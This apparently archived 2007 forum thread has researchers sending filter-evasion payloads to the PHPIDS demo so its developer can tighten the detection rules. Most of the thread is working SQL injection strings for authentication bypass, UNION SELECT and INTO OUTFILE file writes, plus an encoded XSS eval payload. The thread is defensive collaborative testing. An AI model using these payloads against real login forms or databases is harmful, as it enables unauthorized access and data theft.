tx Wrote:
-------------------------------------------------------
> The comment rule
> (?:"\s*(?:#|--|{))|(?:\/\*!\s?\d+)|(?:ch(?:a)?r\s*
> \(\s*\d) catches ?test=' #1 !
> but can be evaded with ?test=' {some expression or
> text here} #{some alphanum} !

As already discussed its very hard to filter "#" correctly because of false positives:
He's Player #1 !

So in my opinion its more important to concentrate on the injection itself (which also work without comments):
having '1
SOUNDS LIKE '1

@Reiners: Yeah, good point on that.
Well for the record, here is another comment evasion:
http://demo.php-ids.org/?test=%27%3B--%20-%7Balphanum%7D-

?test=;-- -{alphanums}-

where {alphanums} is any alphanumeric string

-tx @ lowtech-labs.org

.mario Wrote:
-------------------------------------------------------
> I couldn't wait... all fixx0red :)

they still all work :D
replace all the "asd" with "a sd"

and for the into outfile:
http://demo.php-ids.org/?test=asd'%20INTO%20OUTFILE%2b'C:/webserver/www/readme.php

greetings and a nice weekend ;)

Hi .mario!
most injections get detected now. But again there might be a problem with false positives:
--> ?test=Results are 'true' or 'false'. (php-ids)
--> ?test=Choose between "red" and "green". (php-ids)
--> ?test=SQL Injection contest is coming in around '1 OR '2 weeks. (php-ids)

I guess it is very hard to find a rule for those short "or" sqli without triggering false positives. But I'm sure you will find a way :)

Same for the next injections.
--> ?test=asd' or column^'-1 (php-ids)
--> ?test=asd' or column sounds like '1 (php-ids)
In my opinion those two are not critical, because an attacker would have to guess the column name first and it may be wrong to filter every alphanumeric string behind "' or".

On the other hand the next two can always be used by an attacker:
--> ?test=asd' or md5(5)^'1 (php-ids)
--> ?test=asd' or true -- a (php-ids)


Just some thoughts :)

Hi!

@Reiners: You are creating very hard conditions for the coming contest - hats off ;)

The last ones were pretty hard to fix and required some modifications of the rules and the converter. Also I am still having problems with the comment detection and think about removing # from detection because it's almost impossible to use it the right manner - though makes not that much sense.

The false alerts are fixed and I will take a look at the injections next. Thanks a lot for your submissions!

There's another thing I want to talk about. The last nights I played a little bit levenshtein, soundex and other ways to compare and modify the attacks we have stored in our unit tests. After some time I had some script running which provided pretty surprising output (it's included in the trunk for testing purposes, the demo uses it too right now).

http://groups.google.com/group/php-ids/browse_thread/thread/ed6f0084bc0eb490
http://php-ids.org/files/centrifuge.phps

Maybe it's total bull - maybe we can make use of that. I am not sure - please let me know what you think!

Greetings,
.mario

That sounds good mario! I've been interested in levenshtein for a long time, can you explain how you implemented it?

Rememeber that I once suggest to have a first layer or triage upon reserved chars in the URI? like: {' " ~ ^ # $ ( )} ?

In combination with data length, it could sort out a lot I guess.

Anyway, interesting.

Hi!
the new filter can be circumvented with an escaped quote:
--> ?test=\'asd' or 1='1 (php-ids)

Actually I should start to keep some filter evasions for the contest ;)

greetings, Reiners

edit:
--> ?test=a 1' or if(-1=-1,true,false)#! (php-ids)



Edited 2 time(s). Last edit at 09/22/2007 12:53PM by Reiners.

http://demo.php-ids.org/?test=select%20*something*%20from%20the%20menu

@Ronald: Yep - I remember :) I built this after having no success with levenshtein and pattern comparison. It basically strips out any normal character, normalizes the specials chars and sorts the array. That way attack patterns like (((++::: appear for 85% of all long attacks (concatenation vectors, self-contained xss, filter evasion vectors in general). I think the recent contest showed that one can't rely on blacklisting only.

@Reiners: Wow - I like the escaped one - very cool!

@Spyware: thx for the fa - will fix immediately...

http://demo.php-ids.org/?test=--%3Ewatch%20this%3C--
http://demo.php-ids.org/?test=5%A3%20for%20%22THIS%22



Edited 2 time(s). Last edit at 09/22/2007 03:25PM by Spyware.

@.mario: almost fixed, but escaped quotes can still be used:
--> ?test=111\'aaa' or '1 php-ids

I was just going to show up with some functions which return true (without comparing to a value).
--> ?test=asd' or ISNULL(1/0) #(
--> ?test=asd' or LEAST(2,1) -- -a
But you fixed that already. good job!



Edited 2 time(s). Last edit at 09/22/2007 04:32PM by Reiners.

x=&#x65&#x76&#x61&#x6c,y=&#x61&#x6c&#x65&#x72&#x74&#x28&#x31&#x29
x(y)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Hi .mario!
would you mind if I load the smoketest with a script over and over? I collected some "or" sqli and would like to test them via script modified in different ways.
greetings, Reiners

@Gareth: Nice one - as already stat on the group that one pointed on a big ugly bug in the converter. Thx!

@Reiners: No problem!

Hi!
after the first shoot I get a 403 when accessing the site :( (had about 40 injections loaded).
until that the script worked out quite well :)

Hi!

Hmmm - that shouldn't be - the regression tests for the demo fire around 700 requests a minute at the demo...

What's the exact url you tried?

I had a typo in my script trying to load demo-php.ids.org ... it was early in the morning ;)

seems like you filter everything very well.
I already mentioned this one:
--> ?test=aa'or column='1 (php-ids)

this wasnt that critical because the attacker first would have to guess the column name and its hard to filter words behind "or".
However there are some constants which can be used by an attacker (tested on MySQL, but on other DBMS there might be similar contants to use):

--> ?test=aa'or LOCALTIME!='0 (php-ids)
--> ?test=aa'or BINARY 1= '1 (php-ids)
--> ?test=aa'or current_user!=' 1 (php-ids)

--> ?test=aa'or null is null #( (php-ids)

greetings,
Reiners

more authentication bypass, mostly based around '+'.
I'm just too eager for an sqli contest I think :)

This http://demo.php-ids.org/?test=%27%20or%20username%20REGEXP%20%27admi*%27%20having%201%20%231%20%21 is still getting through.
?test=' or username REGEXP 'admi*' having 1 #1 !

Selecting by id: http://demo.php-ids.org/?test=%27%20or%20id%3D+1%20having%201%20%231%20%21
?test=' or id=+1 having 1 #1 !

Slightly modified version: http://demo.php-ids.org/?test=%27%20or%20id%3D+2-1%20having%201%20%231%20%21
?test=' or id=+2-1 having 1 #1 !

I suppose both of those require that the attacker know the id, but if an IDS isn't seeing the queries, brute forcing the id is pretty trivial.

Soundex: http://demo.php-ids.org/?test=%27%20or%20username%20SOUNDS%20LIKE+%22adnin%22%20and%201%3B%20--%20-a
' or username SOUNDS LIKE+"adnin" and 1; -- -a

Specifying table.column (and more '+'): http://demo.php-ids.org/?test='%20or%20users.username=%2b0x61646D696E;%20--%20-a
?test=' or users.username=+0x61646D696E; -- -a


EDIT:
some union select action: http://demo.php-ids.org/?test=%27%20%28begin%20union%20%28select+aaa%2Cbbb%20from%20ccc%3B%29%20end%29%3B%20--%20-a
?test=' (begin union (select+aaa,bbb from ccc;) end); -- -a

-tx @ lowtech-labs.org



Edited 2 time(s). Last edit at 09/24/2007 11:05PM by tx.

"brute forcing the id" ^^

Okay, hey is this test form only POST or does it also represent GET? a ton of difference if you ask me. Why not cut to the chase and alert reserved chars in the request_uri, saves you 50% headaches.

What's the purpose of the SQL injection contest? Just get a different ID or more dangerous injection?

http://demo.php-ids.org/?test='%20OR%20UserID%20<>%202
http://demo.php-ids.org/?test='%20OR%20UserID%20IS%20NOT%20NULL
http://demo.php-ids.org/?test='%20OR%20UserID%20RLIKE%20'.+'%20
http://demo.php-ids.org/?test='%20OR%20UserID%20>%201

What about when the XSS rules overlap with SQL rules? So what if the SQL rules aren't triggered but the XSS rule is?

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 1 time(s). Last edit at 09/25/2007 03:56AM by Gareth Heyes.

this one is cool (onyl tested on MySQL):
--> ?test=a'='a (php-ids)
or
--> ?test='=' (php-ids)

it works for table listing and auth bypass:
select data from users where name=''='' and password=''=''

with this there are of course a lot of different vectors, since we dont need the "or" anymore.
--> ?test=a'!='0
--> ?test=aa'IS NOT NULL#(
--> ?test=0'XOR'1
--> ?test=a'IN('a')#(
and so on



Edited 1 time(s). Last edit at 09/25/2007 03:45PM by Reiners.

Hi!

Thanks for the submissions - I am totally swamped in work right now but I will try to fix them tomorrow or Thursday...

I like

' OR UserID <> 2

and

'='

best - not UserId 2 matches 1 first - sweet!

Greetings,
.mario

@Ronald: The form accepts POST and GET

Here is a new Auth Bypass, no commenting necessary: http://demo.php-ids.org/?test=abc%27%20NOT%20BETWEEN%20%270
?test=abc' NOT BETWEEN '0

Auth bypass using MATCH (column) AGAINST ('+true -false' IN BOOLEAN MODE): http://demo.php-ids.org/?test=%27%20or%20MATCH%20%28username%29%20AGAINST%20%28%27+admin%20-asds%27%20IN%20BOOLEAN%20MODE%29%20%3B--%20-a
?test=' or MATCH (username) AGAINST ('+admin -asds' IN BOOLEAN MODE) ;-- -a

-tx @ lowtech-labs.org



Edited 3 time(s). Last edit at 09/25/2007 07:25PM by tx.

Hey guys,

I already fixed a bunch of them but not yet all. Will do Thursday evening! Sorry for the lame recent response but I hope after this week has passed I won't be stacked with work that much anymore so it'll get better soon ;)

Greetings and thanks!
.mario

@mario: no worries, I don't know anybody who competes with your fixes+feedback turn around time. beats the hell out of google's 7 days :P

-tx @ lowtech-labs.org



Edited 1 time(s). Last edit at 09/26/2007 10:01PM by tx.

Hi!

They should be fixed right now - tests are updated, regression test suite still running and as it seems no noticeable raise on false alerts. Thx!

Greetings,
.mario

aa'!='1 (php-ids)
aa'!=~'1 (php-ids)
aa'=('aa')#(
aa'|+'1
aa'|!'aa
aa'^!'aa
... (and all those operands and prefixes)

aa'/0 is null #( (php-ids)
aa' DIV null is null #( (php-ids)
aa'DIV+1='aa (php-ids)
aa'or column!='1 (php-ids)
aa'or column DIV null IS NULL #( (php-ids)
aa'or column+(1)='1 (php-ids)
aa'or id sounds like'\' (php-ids)



Edited 3 time(s). Last edit at 09/27/2007 12:08PM by Reiners.

@.mario: excellent fixes!

The MATCH...AGAINST auth bypass is still undetected: http://demo.php-ids.org/?test=%27%20or%20MATCH%20%28username%29%20AGAINST%20%28%27%2badmin%20-asds%27%20IN%20BOOLEAN%20MODE%29%3B%20--%20-a
?test=' or MATCH (username) AGAINST ('+admin -asds' IN BOOLEAN MODE) ;-- -a

Modified versions of the NOT BETWEEN vector: http://demo.php-ids.org/?test=abc%27%20NOT%20BETWEEN%20%21%21%270
?test=abc' NOT BETWEEN !!'0
This works with any even amount of '!' (w00t double negatives!):
?test=abc' NOT BETWEEN !!!!'0
?test=abc' NOT BETWEEN !!!!!!!!!!!!!!'0
More variations (likewise with multiple negation):
?test=abc' NOT BETWEEN !0 = !!'0
?test=abc' NOT BETWEEN !0 != !!!'0
?test=abc' NOT BETWEEN !+0 != !'0

I really think NOT BETWEEN is cool because it completely changes the context of the second clause in certain types of auth queries:

$sql = "SELECT * FROM `users` WHERE username='".$_GET['u']."' and password='".$_GET['p']."' LIMIT 1";

if 
  $_GET['u']= "' NOT BETWEEN !+0 != !'0"
  $_GET['p']= ''
query becomes:
SELECT * FROM `users` WHERE username='' NOT BETWEEN !+0 != !'0' and password='' LIMIT 1";

bam!

:)

-tx @ lowtech-labs.org



Edited 3 time(s). Last edit at 09/27/2007 03:34PM by tx.

I don't know much of SQL injection but, isn't this exploitable:
http://demo.php-ids.org/?test=+z'

EDIT 1/3:
(Don't click, copy paste, quote gets cut off) (Copy paste won't work either xD, do it manually)

EDIT 2:
False
http://demo.php-ids.org/?test=so%20I%20said%20%22back%20off!%22



Edited 3 time(s). Last edit at 09/27/2007 03:35PM by Spyware.

@Spyware: in most queries +z' will leave you with an uneven number of quotes which will throw an error.
ie:

 Select * from `table` where id={injection point};

becomes

Select * from `table` where id=+z';

EDIT: @Spyware: %27 is your friend. %27 = '

-tx @ lowtech-labs.org



Edited 2 time(s). Last edit at 09/27/2007 03:47PM by tx.